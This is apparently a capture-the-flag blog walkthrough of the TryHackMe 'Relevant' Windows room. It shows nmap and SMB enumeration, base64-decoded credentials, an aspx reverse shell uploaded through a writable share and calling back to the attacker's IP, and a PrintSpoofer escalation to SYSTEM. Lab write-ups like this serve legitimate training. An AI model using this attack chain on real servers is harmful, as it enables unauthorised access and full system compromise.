12 minute read

yearofthepig

Relevant is a medium rated widows room on TryHackMe by TheMayor. Here contents of a share on the smb which can be accessed by anyone, is relfected to a webserver which is used to get a shell on the box as IIS user and SeImpersonatePrivilege was abused to get a system shell on the box.

Port Scan

All Port

local@local:~/Documents/tryhackme/relevant$ nmap -p- --max-retries 0 --min-rate 3000 -oN allports 10.10.95.250
Warning: 10.10.95.250 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.95.250
Host is up (0.39s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown

# Nmap done at Fri Oct 23 15:08:54 2020 -- 1 IP address (1 host up) scanned in 34.12 seconds

Detailed Scan for top 1000 ports

local@local:~/Documents/tryhackme/relevant$ nmap -sC -sV -oN initial 10.10.34.139
Nmap scan report for 10.10.34.139
Host is up (0.48s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2020-09-21T04:45:02+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
|_ssl-date: 2020-09-21T04:45:41+00:00; -1s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m51s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-09-20T21:45:03-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-21T04:45:02
|_  start_date: 2020-09-21T04:39:55

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 21 10:30:42 2020 -- 1 IP address (1 host up) scanned in 96.97 seconds

There are a lot of ports open. So, lets start enumeration from SMB.

SMB service on Port 445

Trying Null authentication

smbmap without username and password

local@local:~/Documents/tryhackme/relevant$ smbmap -H 10.10.240.19
[+] Finding open SMB ports....

smbmap with username and password

Nothing was returned.

local@local:~/Documents/tryhackme/relevant$ smbmap -H 10.10.240.19 -u anonymous -p anonymous
[+] Finding open SMB ports....

I always try the smbmap to list the shares because along with the share names, it also shows the permissions.

Null authentication using smbclient

local@local:~/Documents/tryhackme/relevant$ smbclient -N -L 10.10.240.19

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
SMB1 disabled -- no workgroup available

I have found smbclient to be the most reliable to list the shares, but it doesnot shows the read/write permissions for the current user. Here ADMIN$, C$ and IPC$ are the default administrative shares and the only thing that is non default is the nt4wrksv share.

Understanding the Default Shares

The $ sign on the end of the shares means it is a hidden share and are not visible from My computer on the device, but we can view them from the shared folders.

  • C$ - This is the default drive share and by default C$ is always enabled
  • IPC$ - The ipc$ share is a resource that shares the named pipes that are essential for communication between programs.
  • ADMIN$ - The default systemroot or Windows directory.

References : https://www.computerhope.com/jargon/h/hiddshar.htm

We that we have found few shares, lets try to connect to the shares.

Trying to connect to each shares

local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\ADMIN$
tree connect failed: NT_STATUS_ACCESS_DENIED
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\C$
tree connect failed: NT_STATUS_ACCESS_DENIED
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\IPC$
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_INVALID_INFO_CLASS listing \*
smb: \> exit
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\nt4wrksv
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:31:04 2020
  ..                                  D        0  Sun Jul 26 03:31:04 2020
  passwords.txt                       A       98  Sat Jul 25 21:00:33 2020

                7735807 blocks of size 4096. 4934467 blocks available
smb: \> 

Looking at the results we can connect to 2 shares,ie IPC$ and nt4wrksv but not to 2 other shares. It is because we dont have enough permission. But we do have enough permission over share nt4wrksv and we can see a file called passwords.txt. We can mount the share to our device which will make it easier to work with.

Mounting the share on local device

local@local:~/Documents/tryhackme/relevant$ mkdir mnt
local@local:~/Documents/tryhackme/relevant$ sudo mount -t cifs //10.10.240.19/nt4wrksv mnt
Password for root@//10.10.240.19/nt4wrksv:                          
local@local:~/Documents/tryhackme/relevant$ ls -la mnt/
total 9
drwxr-xr-x 2 root     root     4096 Jul 26 03:31 .
drwxr-xr-x 5 local local 4096 Nov 13 09:36 ..
-rwxr-xr-x 1 root     root       98 Jul 25 21:00 passwords.txt

In this case we have mounted the share on our device. We could have just downloaded the file using get passwords.txt from inside the smb shell.

Content of passwords.txt

local@local:~/Documents/tryhackme/relevant$ cat passwords.txt 
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Decoded Content

Bob:!P@$$W0rD!123
Bill:Juw4nnaM4n420696969!$$$

We get a bunch of username and passwords. So, lets try check if the credentials are valid.

Using crackmapexec

local@local:~/Documents/tryhackme/relevant$ cat user 
Bob
Bill

local@local:~/Documents/tryhackme/relevant$ cat password
!P@$$W0rD!123
Juw4nnaM4n420696969!$$$
local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u user -p password
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123

CME shows that the credentials for Bob is valid. So lets try to list shares for user Bob.

Listing shares using CME for user Bob

local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u user -p password --shares
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123 
SMB         10.10.240.19    445    RELEVANT         [+] Enumerated shares
SMB         10.10.240.19    445    RELEVANT         Share           Permissions     Remark
SMB         10.10.240.19    445    RELEVANT         -----           -----------     ------
SMB         10.10.240.19    445    RELEVANT         ADMIN$                          Remote Admin
SMB         10.10.240.19    445    RELEVANT         C$                              Default share
SMB         10.10.240.19    445    RELEVANT         IPC$                            Remote IPC
SMB         10.10.240.19    445    RELEVANT         nt4wrksv        READ,WRITE

Looks like we have write permissions for the share nt4wrksv. But it is not over yet. If I specify some user that definitely doesnot exist like this_user_doesnot_exist, the output of the CME will be the following.

Listing shares for user this_user_doesnot_exist

local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u 'this_doesnot_exists' -p 'this_doesnot_exist' --shares
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\this_doesnot_exists:this_doesnot_exist 
SMB         10.10.240.19    445    RELEVANT         [+] Enumerated shares
SMB         10.10.240.19    445    RELEVANT         Share           Permissions     Remark
SMB         10.10.240.19    445    RELEVANT         -----           -----------     ------
SMB         10.10.240.19    445    RELEVANT         ADMIN$                          Remote Admin
SMB         10.10.240.19    445    RELEVANT         C$                              Default share
SMB         10.10.240.19    445    RELEVANT         IPC$                            Remote IPC
SMB         10.10.240.19    445    RELEVANT         nt4wrksv        READ,WRITE 

CME tells us that this is a valid credential and list the shares for us, but this user possibly can not exist and if it does the password cant be the one that we provided. What CME did was, it did the anonymous authentication for the users that does not exist. But it did tell that password of one of our user is incorrect and that might be valid user on the box ie Bill. Since we have write permission of this share, if there is any chance the content of this share is reflected on the webserver, we can put a aspx shell on this share and get code execution, as for linux we would have uploaded a php shell.

Checking the HTTP service on Port 80

1

Directory Bruteforcing

local@local:~/Documents/tryhackme/relevant$ wfuzz -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hc 404 -t 50 http:
//10.10.126.3/FUZZ                                                                       
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************
                                            
Target: http://10.10.126.3/FUZZ
Total requests: 26584
                                                                                        
===================================================================                                                                                                             
ID           Response   Lines    Word     Chars       Payload                                                                                                         
===================================================================
                                                                                                                                                                                
000003809:   200        31 L     55 W     703 Ch      "http://10.10.126.3/"                                                                                           
000013715:   400        6 L      26 W     324 Ch      ".."                                                                                                            
000017472:   400        6 L      26 W     324 Ch      ".."                                                                                                            
000026015:   400        6 L      26 W     324 Ch      "."                                                                                                             

But I found nothing. So I checked whether the file passwords.txt or directory nt4wrksv exists manually.

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3/nt4wrksv -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:26:10 GMT
Content-Length: 0

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3/passwords.txt -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:26:19 GMT
Content-Length: 0

And we get a 404.

Looking at the nmap all ports result we also have a port listening on 49663.

Checking port 49663

2 And it turned out it is also running a HTTP service. So I also ran wfuzz aganist this.

Directory Bruteforcing

local@local:~/Documents/tryhackme/relevant$ wfuzz -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hc 404 -t 50 http://10.10.126.3:49663/FUZZ
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.126.3:49663/FUZZ
Total requests: 26584

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                        
===================================================================

000000056:   301        1 L      10 W     162 Ch      "aspnet_client"                                                                                                
000003809:   200        31 L     55 W     703 Ch      "http://10.10.126.3:49663/"                                                                                    
000013715:   400        6 L      26 W     324 Ch      ".."                                                                                                           
000017472:   400        6 L      26 W     324 Ch      ".."                                                                                                           
000026015:   400        6 L      26 W     324 Ch      "."                                                                                                            

Total time: 639.9951
Processed Requests: 26533
Filtered Requests: 26528
Requests/sec.: 41.45812

This time we find a new directory but with a little search, I found aspnet_client is a folder for “resources which must be served via HTTP, but are installed on a per-server basis, rather than a per-application basis”. So it didnot seem something that the user might have created.

So the next step would be to check if the contents of the SMB service are reflected.

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/passwords.txt -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:33:27 GMT
Content-Length: 0
local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/ -i
HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:34:21 GMT
Content-Length: 0

We get a 404 for file passwords.txt but get a 200 OK for the directory. We get exactly what we are looking for.

Checking for the file inside the SMB share

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Now that the content of the SMB share is reflected on the webserver and also we have write permission on that share, lets copy an aspx shell on the mounted share.

Shell as IIS

Aspx shell

local@local:~/Documents/tryhackme/relevant$ cp /opt/aspx-reverse-shell/shell.aspx shell.aspx

You can find plenty of aspx shell on the internet.

Changing the content of the shell

local@local:~/Documents/tryhackme/relevant$ ifconfig tun0 | grep -i 'inet ' | awk -F " " '{print $2}'
10.6.31.213

Changed content

    protected void Page_Load(object sender, EventArgs e)
    {
        String host = "10.6.31.213"; //CHANGE THIS
            int port = 9001; ////CHANGE THIS
                
        CallbackShell(host, port);
    }

We have changed the contents with our IP and the port that we will be listening on.

Netcat listener on port 9001

local@local:~/Documents/tryhackme/relevant$ rlwrap nc -nvlp 9001
Listening on 0.0.0.0 9001

And notice something different here. I am using rlwrap which can be installed from apt store. As on linux the returned shell would not have autocompletion or arrow keys functions so, we used to get a interactive shell using python or socat. Here using rlwrap we can get the functionality of the arrow keys only.

Copying the shell inside mnt

local@local:~/Documents/tryhackme/relevant$ sudo cp shell.aspx mnt/shell.aspx
[sudo] password for local: 
local@local:~/Documents/tryhackme/relevant$ ls -la mnt
total 25
drwxr-xr-x 2 root     root      4096 Nov 13 10:31 .
drwxr-xr-x 5 local local  4096 Nov 13 10:26 ..
-rwxr-xr-x 1 root     root        98 Jul 25 21:00 passwords.txt
-rwxr-xr-x 1 root     root     15970 Nov 13 10:31 shell.aspx

Visiting the shell.aspx

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/shell.aspx

We do not get ouptut and if we check the netcat listener, we get a shell back.

local@local:~/Documents/tryhackme/relevant$ rlwrap nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.126.3 49838
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Here we are running as IIS user which is a service account on the windows box. It is similiar to www-data on the linux box. As we have a shell as iis, we can read the content of the inetpub directory which contains the content of the webserver. inetpub can be thought as the /var/www/html in the linux system.

Privilege Escalation

The first thing that I do on the linux on is checking the sudoers entry using sudo -l and on the windows we have to first check the privilege assigned to the user that we are running as. Since we are running as IIS, it is likely that the service accounts have more privileges than the normal user account. Privileges are something that when enabled gives the low privilege user to do some privileged operaion.

Listing privileges using whoami /priv

c:\inetpub>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------
[]
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can see that few of the privileges are enabled for our user. And we can use the SeImpersonatePrivilege to get the shell as authority/system. If you have having a very hard time with the privilege escalation on windows, you could solve windows10privesc by Tib3rius and windowsprivescarena by TCM.

Getting a system shell

3 So I will be using printSpoofer to get a system shell.

Downloading the file to the box from github

local@local:~/Documents/tryhackme/relevant$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -O PrintSpoofer.exe
--2020-11-13 10:56:35--  https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
HTTP request sent, awaiting response... 200 OK
Length: 27136 (26K) [application/octet-stream]
Saving to: ‘PrintSpoofer.exe’

PrintSpoofer.exe                            100%[===========================================================================================>]  26.50K   109KB/s    in 0.2s    

2020-11-13 10:56:37 (109 KB/s) - ‘PrintSpoofer.exe’ saved [27136/27136]

Lets upload this file differently using smbclient.

local@local:~/Documents/tryhackme/relevant$ smbclient -N \\\\10.10.184.223\\nt4wrksv
Try "help" to get a list of possible commands.
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (19.2 kb/s) (average 15.1 kb/s)
smb: \> 

Listing the content

c:\inetpub\wwwroot>dir                   
dir                                                                                     
 Volume in drive C has no label.                                                        
 Volume Serial Number is AC3C-5CB5                             
 Directory of c:\inetpub\wwwroot\nt4wrksv

11/12/2020  10:09 PM    <DIR>          .
11/12/2020  10:09 PM    <DIR>          ..
07/25/2020  07:15 AM                98 passwords.txt
11/12/2020  10:09 PM            27,136 PrintSpoofer.exe
11/12/2020  10:08 PM            15,970 shell.aspx
               3 File(s)         43,204 bytes
               2 Dir(s)  20,269,436,928 bytes free

Execution on the windows box

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

And now we are nt authority\system.

Reading the root flag

C:\Windows\system32>cd \users\administrator\desktop
cd \users\administrator\desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users\Administrator\Desktop

07/25/2020  07:24 AM    <DIR>          .
07/25/2020  07:24 AM    <DIR>          ..
07/25/2020  07:25 AM                35 root.txt
               1 File(s)             35 bytes
               2 Dir(s)  20,269,117,440 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf****************45pv}